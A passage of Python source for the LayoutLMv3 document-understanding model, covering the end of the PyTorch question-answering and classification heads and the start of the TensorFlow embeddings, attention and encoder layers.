        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        bbox: Optional[torch.LongTensor] = None,
        pixel_values: Optional[torch.LongTensor] = None,
    ) -> Union[Tuple, QuestionAnsweringModelOutput]:
        r"""
        start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoProcessor, AutoModelForQuestionAnswering
        >>> from datasets import load_dataset
        >>> import torch
        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = AutoModelForQuestionAnswering.from_pretrained("microsoft/layoutlmv3-base")
        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> question = "what's his name?"
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]
        >>> encoding = processor(image, question, words, boxes=boxes, return_tensors="pt")
        >>> start_positions = torch.tensor([1])
        >>> end_positions = torch.tensor([3])
        >>> outputs = model(**encoding, start_positions=start_positions, end_positions=end_positions)
        >>> loss = outputs.loss
        >>> start_scores = outputs.start_logits
        >>> end_scores = outputs.end_logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.layoutlmv3(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            bbox=bbox,
            pixel_values=pixel_values,
        )
        # NOTE(review): unlike the token-classification head, no slicing to the text part is done here —
        # the span head scores every output position. Presumably span labels only ever point at text
        # positions; confirm against the processor/caller.
        sequence_output = outputs[0]
        # (batch, seq, 2) -> two (batch, seq) tensors: start and end scores per position.
        logits = self.qa_outputs(sequence_output)
        start_logits, end_logits = logits.split(1, dim=-1)
        start_logits = start_logits.squeeze(-1).contiguous()
        end_logits = end_logits.squeeze(-1).contiguous()
        total_loss = None
        if start_positions is not None and end_positions is not None:
            # If we are on multi-GPU, split add a dimension
            if len(start_positions.size()) > 1:
                start_positions = start_positions.squeeze(-1)
            if len(end_positions.size()) > 1:
                end_positions = end_positions.squeeze(-1)
            # sometimes the start/end positions are outside our model inputs, we ignore these terms
            ignored_index = start_logits.size(1)
            start_positions = start_positions.clamp(0, ignored_index)
            end_positions = end_positions.clamp(0, ignored_index)
            # Out-of-range targets were clamped to `ignored_index`, which the loss then skips.
            loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
            start_loss = loss_fct(start_logits, start_positions)
            end_loss = loss_fct(end_logits, end_positions)
            # Standard SQuAD-style objective: average of start and end cross-entropies.
            total_loss = (start_loss + end_loss) / 2
        if not return_dict:
            # Tuple output: (loss?, start_logits, end_logits, *extra model outputs).
            output = (start_logits, end_logits) + outputs[1:]
            return ((total_loss,) + output) if total_loss is not None else output
        return QuestionAnsweringModelOutput(
            loss=total_loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """
    LayoutLMv3 Model with a sequence classification head on top (a linear layer on top of the final hidden state of the
    [CLS] token) e.g. for document image classification tasks such as the
    [RVL-CDIP](https://www.cs.cmu.edu/~aharley/rvl-cdip/) dataset.
    """,
    LAYOUTLMV3_START_DOCSTRING,
)
class LayoutLMv3ForSequenceClassification(LayoutLMv3PreTrainedModel):
    # position_ids are recreated on load, so a missing key is expected and harmless.
    _keys_to_ignore_on_load_missing = [r"position_ids"]
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.config = config
        self.layoutlmv3 = LayoutLMv3Model(config)
        # Classification head applied to the first-position representation (see forward).
        self.classifier = LayoutLMv3ClassificationHead(config, pool_feature=False)
        self.init_weights()
    @add_start_docstrings_to_model_forward(
        LAYOUTLMV3_DOWNSTREAM_INPUTS_DOCSTRING.format("batch_size, sequence_length")
    )
    @replace_return_docstrings(output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        bbox: Optional[torch.LongTensor] = None,
        pixel_values: Optional[torch.LongTensor] = None,
    ) -> Union[Tuple, SequenceClassifierOutput]:
        """
        Returns:
        Examples:
        ```python
        >>> from transformers import AutoProcessor, AutoModelForSequenceClassification
        >>> from datasets import load_dataset
        >>> import torch
        >>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
        >>> model = AutoModelForSequenceClassification.from_pretrained("microsoft/layoutlmv3-base")
        >>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
        >>> example = dataset[0]
        >>> image = example["image"]
        >>> words = example["tokens"]
        >>> boxes = example["bboxes"]
        >>> encoding = processor(image, words, boxes=boxes, return_tensors="pt")
        >>> sequence_label = torch.tensor([1])
        >>> outputs = model(**encoding, labels=sequence_label)
        >>> loss = outputs.loss
        >>> logits = outputs.logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.layoutlmv3(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
            bbox=bbox,
            pixel_values=pixel_values,
        )
        # Classify from the representation of the first position (the [CLS]-style token).
        sequence_output = outputs[0][:, 0, :]
        logits = self.classifier(sequence_output)
        loss = None
        if labels is not None:
            # Infer the task type once from num_labels and the label dtype, then cache it on the config.
            if self.config.problem_type is None:
                if self.num_labels == 1:
                    self.config.problem_type = "regression"
                elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
                    self.config.problem_type = "single_label_classification"
                else:
                    self.config.problem_type = "multi_label_classification"
            if self.config.problem_type == "regression":
                loss_fct = MSELoss()
                if self.num_labels == 1:
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif self.config.problem_type == "single_label_classification":
                loss_fct = CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
            elif self.config.problem_type == "multi_label_classification":
                # Multi-label: independent sigmoid per class.
                loss_fct = BCEWithLogitsLoss()
                loss = loss_fct(logits, labels)
        if not return_dict:
            # Tuple output: (loss?, logits, *extra model outputs).
            output = (logits,) + outputs[1:]
            return ((loss,) + output) if loss is not None else output
        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
|
27182812/ChatGLM-LLaMA-chinese-insturct | 71,537 | src/transformers/models/layoutlmv3/modeling_tf_layoutlmv3.py | # coding=utf-8
# Copyright 2022 Microsoft Research and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TF 2.0 LayoutLMv3 model."""
import collections
import math
from typing import Dict, List, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFTokenClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, replace_return_docstrings
from .configuration_layoutlmv3 import LayoutLMv3Config
_CONFIG_FOR_DOC = "LayoutLMv3Config"  # config class name referenced by auto-generated docstrings
# NOTE(review): presumably used as the model's dummy/serving inputs — confirm against the rest of the file.
_DUMMY_INPUT_IDS = [
    [7, 6, 1],
    [1, 2, 0],
]
# One (x0, y0, x1, y1) bounding box per dummy token above.
_DUMMY_BBOX = [
    [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
    [[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]],
]
TF_LAYOUTLMV3_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "microsoft/layoutlmv3-base",
    "microsoft/layoutlmv3-large",
    # See all LayoutLMv3 models at https://huggingface.co/models?filter=layoutlmv3
]
# Additive attention-mask value: large enough to zero masked positions after softmax.
LARGE_NEGATIVE = -1e8
class TFLayoutLMv3PatchEmbeddings(tf.keras.layers.Layer):
    """Turns a batch of document images into a sequence of patch embeddings (LayoutLMv3 visual branch)."""

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        patch_dims = (
            (config.patch_size, config.patch_size)
            if not isinstance(config.patch_size, collections.abc.Iterable)
            else config.patch_size
        )
        # A non-overlapping convolution (stride == kernel) projects every patch to the hidden size.
        self.proj = tf.keras.layers.Conv2D(
            filters=config.hidden_size,
            kernel_size=patch_dims,
            strides=patch_dims,
            padding="valid",
            data_format="channels_last",
            use_bias=True,
            kernel_initializer=get_initializer(config.initializer_range),
            name="proj",
        )
        self.hidden_size = config.hidden_size
        self.num_patches = (config.input_size**2) // (patch_dims[0] * patch_dims[1])

    def call(self, pixel_values: tf.Tensor) -> tf.Tensor:
        # `tf.keras.layers.Conv2D` does not support `NCHW` on CPU, so convert to `NHWC` first.
        channels_last = tf.transpose(pixel_values, perm=[0, 2, 3, 1])
        projected = self.proj(channels_last)
        # Collapse the spatial grid into one sequence: (batch, num_patches, hidden_size).
        return tf.reshape(projected, (-1, self.num_patches, self.hidden_size))
class TFLayoutLMv3TextEmbeddings(tf.keras.layers.Layer):
    """
    LayoutLMv3 text embeddings. Same as `RobertaEmbeddings` but with added spatial (layout) embeddings.
    """
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.word_embeddings = tf.keras.layers.Embedding(
            config.vocab_size,
            config.hidden_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="word_embeddings",
        )
        self.token_type_embeddings = tf.keras.layers.Embedding(
            config.type_vocab_size,
            config.hidden_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="token_type_embeddings",
        )
        self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
        self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob)
        self.padding_token_index = config.pad_token_id
        self.position_embeddings = tf.keras.layers.Embedding(
            config.max_position_embeddings,
            config.hidden_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="position_embeddings",
        )
        # Layout embeddings: x/y tables embed box corner coordinates,
        # h/w tables embed box height and width (all shared across tokens).
        self.x_position_embeddings = tf.keras.layers.Embedding(
            config.max_2d_position_embeddings,
            config.coordinate_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="x_position_embeddings",
        )
        self.y_position_embeddings = tf.keras.layers.Embedding(
            config.max_2d_position_embeddings,
            config.coordinate_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="y_position_embeddings",
        )
        self.h_position_embeddings = tf.keras.layers.Embedding(
            config.max_2d_position_embeddings,
            config.shape_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="h_position_embeddings",
        )
        self.w_position_embeddings = tf.keras.layers.Embedding(
            config.max_2d_position_embeddings,
            config.shape_size,
            embeddings_initializer=get_initializer(config.initializer_range),
            name="w_position_embeddings",
        )
        self.max_2d_positions = config.max_2d_position_embeddings
    def calculate_spatial_position_embeddings(self, bbox: tf.Tensor) -> tf.Tensor:
        """Embed each token's bounding box (x0, y0, x1, y1) plus its height and width, concatenated."""
        try:
            left_position_ids = bbox[:, :, 0]
            upper_position_ids = bbox[:, :, 1]
            right_position_ids = bbox[:, :, 2]
            lower_position_ids = bbox[:, :, 3]
        except IndexError as exception:
            raise IndexError("Bounding box is not of shape (batch_size, seq_length, 4).") from exception
        try:
            left_position_embeddings = self.x_position_embeddings(left_position_ids)
            upper_position_embeddings = self.y_position_embeddings(upper_position_ids)
            right_position_embeddings = self.x_position_embeddings(right_position_ids)
            lower_position_embeddings = self.y_position_embeddings(lower_position_ids)
        except IndexError as exception:
            raise IndexError(
                f"The `bbox` coordinate values should be within 0-{self.max_2d_positions} range."
            ) from exception
        max_position_id = self.max_2d_positions - 1
        # Height/width are derived from the corners and clamped into the embedding table's valid range.
        h_position_embeddings = self.h_position_embeddings(
            tf.clip_by_value(bbox[:, :, 3] - bbox[:, :, 1], 0, max_position_id)
        )
        w_position_embeddings = self.w_position_embeddings(
            tf.clip_by_value(bbox[:, :, 2] - bbox[:, :, 0], 0, max_position_id)
        )
        # LayoutLMv1 sums the spatial embeddings, but LayoutLMv3 concatenates them.
        spatial_position_embeddings = tf.concat(
            [
                left_position_embeddings,
                upper_position_embeddings,
                right_position_embeddings,
                lower_position_embeddings,
                h_position_embeddings,
                w_position_embeddings,
            ],
            axis=-1,
        )
        return spatial_position_embeddings
    def create_position_ids_from_inputs_embeds(self, inputs_embds: tf.Tensor) -> tf.Tensor:
        """
        We are provided embeddings directly. We cannot infer which are padded, so just generate sequential position
        ids.
        """
        input_shape = tf.shape(inputs_embds)
        sequence_length = input_shape[1]
        # RoBERTa-style offset: real positions start right after the padding index.
        start_index = self.padding_token_index + 1
        end_index = self.padding_token_index + sequence_length + 1
        position_ids = tf.range(start_index, end_index, dtype=tf.int32)
        batch_size = input_shape[0]
        position_ids = tf.reshape(position_ids, (1, sequence_length))
        position_ids = tf.tile(position_ids, (batch_size, 1))
        return position_ids
    def create_position_ids_from_input_ids(self, input_ids: tf.Tensor) -> tf.Tensor:
        """
        Replace non-padding symbols with their position numbers. Position numbers begin at padding_token_index + 1.
        """
        # cumsum over the non-padding mask numbers real tokens 1..n; multiplying by the mask
        # keeps padding at 0, and the final offset maps padding to padding_token_index itself.
        mask = tf.cast(tf.not_equal(input_ids, self.padding_token_index), input_ids.dtype)
        position_ids = tf.cumsum(mask, axis=1) * mask
        position_ids = position_ids + self.padding_token_index
        return position_ids
    def create_position_ids(self, input_ids: tf.Tensor, inputs_embeds: tf.Tensor) -> tf.Tensor:
        """Dispatch position-id creation depending on whether token ids are available."""
        if input_ids is None:
            return self.create_position_ids_from_inputs_embeds(inputs_embeds)
        else:
            return self.create_position_ids_from_input_ids(input_ids)
    def call(
        self,
        input_ids: Optional[tf.Tensor] = None,
        bbox: tf.Tensor = None,
        token_type_ids: Optional[tf.Tensor] = None,
        position_ids: Optional[tf.Tensor] = None,
        inputs_embeds: Optional[tf.Tensor] = None,
        training: bool = False,
    ) -> tf.Tensor:
        """Sum word, token-type, 1D position and 2D layout embeddings, then LayerNorm + dropout."""
        if position_ids is None:
            position_ids = self.create_position_ids(input_ids, inputs_embeds)
        if input_ids is not None:
            input_shape = tf.shape(input_ids)
        else:
            input_shape = tf.shape(inputs_embeds)[:-1]
        if token_type_ids is None:
            token_type_ids = tf.zeros(input_shape, dtype=position_ids.dtype)
        if inputs_embeds is None:
            # Note: tf.gather, on which the embedding layer is based, won't check positive out of bound
            # indices on GPU, returning zeros instead. This is a dangerous silent behavior.
            tf.debugging.assert_less(
                input_ids,
                tf.cast(self.word_embeddings.input_dim, dtype=input_ids.dtype),
                message=(
                    "input_ids must be smaller than the embedding layer's input dimension (got"
                    f" {tf.math.reduce_max(input_ids)} >= {self.word_embeddings.input_dim})"
                ),
            )
            inputs_embeds = self.word_embeddings(input_ids)
        token_type_embeddings = self.token_type_embeddings(token_type_ids)
        embeddings = inputs_embeds + token_type_embeddings
        position_embeddings = self.position_embeddings(position_ids)
        embeddings += position_embeddings
        spatial_position_embeddings = self.calculate_spatial_position_embeddings(bbox)
        embeddings += spatial_position_embeddings
        embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings, training=training)
        return embeddings
class TFLayoutLMv3SelfAttention(tf.keras.layers.Layer):
    """Multi-head self-attention with optional 1D/2D relative-position biases and a
    numerically-stabilised (CogView) softmax."""
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        if config.hidden_size % config.num_attention_heads != 0:
            raise ValueError(
                f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
                f"heads ({config.num_attention_heads})"
            )
        self.num_attention_heads = config.num_attention_heads
        self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
        self.all_head_size = self.num_attention_heads * self.attention_head_size
        # sqrt(d_head): scores are divided by this before softmax (scaled dot-product attention).
        self.attention_score_normaliser = math.sqrt(self.attention_head_size)
        self.query = tf.keras.layers.Dense(
            self.all_head_size,
            kernel_initializer=get_initializer(config.initializer_range),
            name="query",
        )
        self.key = tf.keras.layers.Dense(
            self.all_head_size,
            kernel_initializer=get_initializer(config.initializer_range),
            name="key",
        )
        self.value = tf.keras.layers.Dense(
            self.all_head_size,
            kernel_initializer=get_initializer(config.initializer_range),
            name="value",
        )
        self.dropout = tf.keras.layers.Dropout(config.attention_probs_dropout_prob)
        self.has_relative_attention_bias = config.has_relative_attention_bias
        self.has_spatial_attention_bias = config.has_spatial_attention_bias
    def transpose_for_scores(self, x: tf.Tensor):
        """Split the last dimension into heads: (batch, seq, all_head) -> (batch, heads, seq, head_size)."""
        shape = tf.shape(x)
        new_shape = (
            shape[0],  # batch_size
            shape[1],  # seq_length
            self.num_attention_heads,
            self.attention_head_size,
        )
        x = tf.reshape(x, new_shape)
        return tf.transpose(x, perm=[0, 2, 1, 3])  # batch_size, num_heads, seq_length, attention_head_size
    def cogview_attention(self, attention_scores: tf.Tensor, alpha: Union[float, int] = 32):
        """
        https://arxiv.org/abs/2105.13290 Section 2.4 Stabilization of training: Precision Bottleneck Relaxation
        (PB-Relax). A replacement of the original tf.keras.layers.Softmax(axis=-1)(attention_scores). Seems the new
        attention_probs will result in a slower speed and a little bias. Can use
        tf.debugging.assert_near(standard_attention_probs, cogview_attention_probs, atol=1e-08) for comparison. The
        smaller atol (e.g., 1e-08), the better.
        """
        # Scale down, subtract the per-row max, scale back up: softmax is shift-invariant,
        # so this only changes the floating-point range, not the (exact-arithmetic) result.
        scaled_attention_scores = attention_scores / alpha
        max_value = tf.expand_dims(tf.reduce_max(scaled_attention_scores, axis=-1), axis=-1)
        new_attention_scores = (scaled_attention_scores - max_value) * alpha
        return tf.math.softmax(new_attention_scores, axis=-1)
    def call(
        self,
        hidden_states: tf.Tensor,
        attention_mask: Optional[tf.Tensor],
        head_mask: Optional[tf.Tensor],
        output_attentions: bool,
        rel_pos: Optional[tf.Tensor] = None,
        rel_2d_pos: Optional[tf.Tensor] = None,
        training: bool = False,
    ) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
        key_layer = self.transpose_for_scores(self.key(hidden_states))
        value_layer = self.transpose_for_scores(self.value(hidden_states))
        query_layer = self.transpose_for_scores(self.query(hidden_states))
        # Take the dot product between "query" and "key" to get the raw attention scores.
        normalised_query_layer = query_layer / self.attention_score_normaliser
        transposed_key_layer = tf.transpose(
            key_layer, perm=[0, 1, 3, 2]
        )  # batch_size, num_heads, attention_head_size, seq_length
        attention_scores = tf.matmul(normalised_query_layer, transposed_key_layer)
        # Relative-position biases are divided by the same normaliser so they live on the
        # same scale as the (already-normalised) dot-product scores.
        if self.has_relative_attention_bias and self.has_spatial_attention_bias:
            attention_scores += (rel_pos + rel_2d_pos) / self.attention_score_normaliser
        elif self.has_relative_attention_bias:
            attention_scores += rel_pos / self.attention_score_normaliser
        if attention_mask is not None:
            # Apply the attention mask (is precomputed for all layers in TFLayoutLMv3Model call() function)
            attention_scores += attention_mask
        # Normalize the attention scores to probabilities.
        # Use the trick of CogView paper to stabilize training.
        attention_probs = self.cogview_attention(attention_scores)
        attention_probs = self.dropout(attention_probs, training=training)
        # Mask heads if we want to.
        if head_mask is not None:
            attention_probs = attention_probs * head_mask
        context_layer = tf.matmul(attention_probs, value_layer)
        context_layer = tf.transpose(
            context_layer, perm=[0, 2, 1, 3]
        )  # batch_size, seq_length, num_heads, attention_head_size
        shape = tf.shape(context_layer)
        # Merge the heads back into a single hidden dimension.
        context_layer = tf.reshape(
            context_layer, (shape[0], shape[1], self.all_head_size)
        )  # batch_size, seq_length, num_heads * attention_head_size
        outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
        return outputs
# Copied from models.roberta.modeling_tf_roberta.TFRobertaSelfOutput
class TFLayoutLMv3SelfOutput(tf.keras.layers.Layer):
    """Projects attention context back to the hidden size, then dropout + residual + LayerNorm."""
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
        self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
    def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.dropout(inputs=hidden_states, training=training)
        # Residual connection: add the block's input before normalising.
        hidden_states = self.LayerNorm(inputs=hidden_states + input_tensor)
        return hidden_states
class TFLayoutLMv3Attention(tf.keras.layers.Layer):
    """Full attention block: multi-head self-attention followed by its residual output projection."""

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.self_attention = TFLayoutLMv3SelfAttention(config, name="self")
        self.self_output = TFLayoutLMv3SelfOutput(config, name="output")

    def call(
        self,
        hidden_states: tf.Tensor,
        attention_mask: Optional[tf.Tensor],
        head_mask: Optional[tf.Tensor],
        output_attentions: bool,
        rel_pos: Optional[tf.Tensor] = None,
        rel_2d_pos: Optional[tf.Tensor] = None,
        training: bool = False,
    ) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
        attention_results = self.self_attention(
            hidden_states,
            attention_mask,
            head_mask,
            output_attentions,
            rel_pos,
            rel_2d_pos,
            training=training,
        )
        # Project the attention context and apply the residual connection to the block's input.
        projected = self.self_output(attention_results[0], hidden_states, training=training)
        # If attention probabilities were requested, they trail the projected output.
        return (projected,) + attention_results[1:]
# Copied from models.roberta.modeling_tf_bert.TFRobertaIntermediate
class TFLayoutLMv3Intermediate(tf.keras.layers.Layer):
    """Feed-forward expansion to `intermediate_size` followed by the configured activation."""
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        # The activation may be given as a name (string) or as a callable.
        if isinstance(config.hidden_act, str):
            self.intermediate_act_fn = get_tf_activation(config.hidden_act)
        else:
            self.intermediate_act_fn = config.hidden_act
    def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.intermediate_act_fn(hidden_states)
        return hidden_states
# Copied from models.roberta.modeling_tf_bert.TFRobertaOutput
class TFLayoutLMv3Output(tf.keras.layers.Layer):
    """Feed-forward projection back to the hidden size, then dropout + residual + LayerNorm."""
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.dense = tf.keras.layers.Dense(
            units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
        )
        self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
        self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
    def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
        hidden_states = self.dense(inputs=hidden_states)
        hidden_states = self.dropout(inputs=hidden_states, training=training)
        # Residual connection: add the feed-forward block's input before normalising.
        hidden_states = self.LayerNorm(inputs=hidden_states + input_tensor)
        return hidden_states
class TFLayoutLMv3Layer(tf.keras.layers.Layer):
    """A single transformer encoder layer: an attention block followed by a feed-forward block."""

    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.attention = TFLayoutLMv3Attention(config, name="attention")
        self.intermediate = TFLayoutLMv3Intermediate(config, name="intermediate")
        self.bert_output = TFLayoutLMv3Output(config, name="output")

    def call(
        self,
        hidden_states: tf.Tensor,
        attention_mask: Optional[tf.Tensor],
        head_mask: Optional[tf.Tensor],
        output_attentions: bool,
        rel_pos: Optional[tf.Tensor] = None,
        rel_2d_pos: Optional[tf.Tensor] = None,
        training: bool = False,
    ) -> Union[Tuple[tf.Tensor], Tuple[tf.Tensor, tf.Tensor]]:
        attention_results = self.attention(
            hidden_states,
            attention_mask,
            head_mask,
            output_attentions=output_attentions,
            rel_pos=rel_pos,
            rel_2d_pos=rel_2d_pos,
            training=training,
        )
        attended = attention_results[0]
        # Feed-forward sub-block: expand, activate, project back (with its own residual + LayerNorm).
        layer_output = self.bert_output(self.intermediate(attended), attended, training=training)
        # The layer output comes first; attention probabilities (if requested) follow.
        return (layer_output,) + attention_results[1:]
class TFLayoutLMv3Encoder(tf.keras.layers.Layer):
    """Stack of transformer layers with optional shared 1D (sequence) and 2D (layout)
    relative-position attention biases computed once and reused by every layer."""
    def __init__(self, config: LayoutLMv3Config, **kwargs):
        super().__init__(**kwargs)
        self.config = config
        self.layer = [TFLayoutLMv3Layer(config, name=f"layer.{i}") for i in range(config.num_hidden_layers)]
        self.has_relative_attention_bias = config.has_relative_attention_bias
        self.has_spatial_attention_bias = config.has_spatial_attention_bias
        if self.has_relative_attention_bias:
            self.rel_pos_bins = config.rel_pos_bins
            self.max_rel_pos = config.max_rel_pos
            # Maps one-hot bucket indices to per-head bias values (a learned lookup table).
            self.rel_pos_bias = tf.keras.layers.Dense(
                units=config.num_attention_heads,
                kernel_initializer=get_initializer(config.initializer_range),
                use_bias=False,
                name="rel_pos_bias",
            )
        if self.has_spatial_attention_bias:
            self.max_rel_2d_pos = config.max_rel_2d_pos
            self.rel_2d_pos_bins = config.rel_2d_pos_bins
            self.rel_pos_x_bias = tf.keras.layers.Dense(
                units=config.num_attention_heads,
                kernel_initializer=get_initializer(config.initializer_range),
                use_bias=False,
                name="rel_pos_x_bias",
            )
            self.rel_pos_y_bias = tf.keras.layers.Dense(
                units=config.num_attention_heads,
                kernel_initializer=get_initializer(config.initializer_range),
                use_bias=False,
                name="rel_pos_y_bias",
            )
    def relative_position_bucket(self, relative_positions: tf.Tensor, num_buckets: int, max_distance: int):
        """Map signed relative distances to bucket ids: exact buckets for small distances,
        logarithmically-spaced buckets up to `max_distance`, sign encoded by a half-range offset."""
        # the negative relative positions are assigned to the interval [0, num_buckets / 2]
        # we deal with this by assigning absolute relative positions to the interval [0, num_buckets / 2]
        # and then offsetting the positive relative positions by num_buckets / 2 at the end
        num_buckets = num_buckets // 2
        buckets = tf.abs(relative_positions)
        # half of the buckets are for exact increments in positions
        max_exact_buckets = num_buckets // 2
        is_small = buckets < max_exact_buckets
        # the other half of the buckets are for logarithmically bigger bins in positions up to max_distance
        buckets_log_ratio = tf.math.log(tf.cast(buckets, tf.float32) / max_exact_buckets)
        distance_log_ratio = math.log(max_distance / max_exact_buckets)
        buckets_big_offset = (
            buckets_log_ratio / distance_log_ratio * (num_buckets - max_exact_buckets)
        )  # scale is [0, num_buckets - max_exact_buckets]
        buckets_big = max_exact_buckets + buckets_big_offset  # scale is [max_exact_buckets, num_buckets]
        buckets_big = tf.cast(buckets_big, buckets.dtype)
        buckets_big = tf.minimum(buckets_big, num_buckets - 1)
        return (tf.cast(relative_positions > 0, buckets.dtype) * num_buckets) + tf.where(
            is_small, buckets, buckets_big
        )
    def _cal_pos_emb(
        self,
        dense_layer: tf.keras.layers.Dense,
        position_ids: tf.Tensor,
        num_buckets: int,
        max_distance: int,
    ):
        """Compute a per-head bias tensor from pairwise position differences via bucketing + lookup."""
        # Pairwise signed distances between every pair of positions: (batch, seq, seq).
        rel_pos_matrix = tf.expand_dims(position_ids, axis=-2) - tf.expand_dims(position_ids, axis=-1)
        rel_pos = self.relative_position_bucket(rel_pos_matrix, num_buckets, max_distance)
        # One-hot + bias-free Dense acts as an embedding lookup over the bucket ids.
        rel_pos_one_hot = tf.one_hot(rel_pos, depth=num_buckets, dtype=self.compute_dtype)
        embedding = dense_layer(rel_pos_one_hot)
        # batch_size, seq_length, seq_length, num_heads --> batch_size, num_heads, seq_length, seq_length
        embedding = tf.transpose(embedding, [0, 3, 1, 2])
        embedding = tf.cast(embedding, dtype=self.compute_dtype)
        return embedding
    def _cal_1d_pos_emb(self, position_ids: tf.Tensor):
        """1D (sequence-order) relative-position bias."""
        return self._cal_pos_emb(self.rel_pos_bias, position_ids, self.rel_pos_bins, self.max_rel_pos)
    def _cal_2d_pos_emb(self, bbox: tf.Tensor):
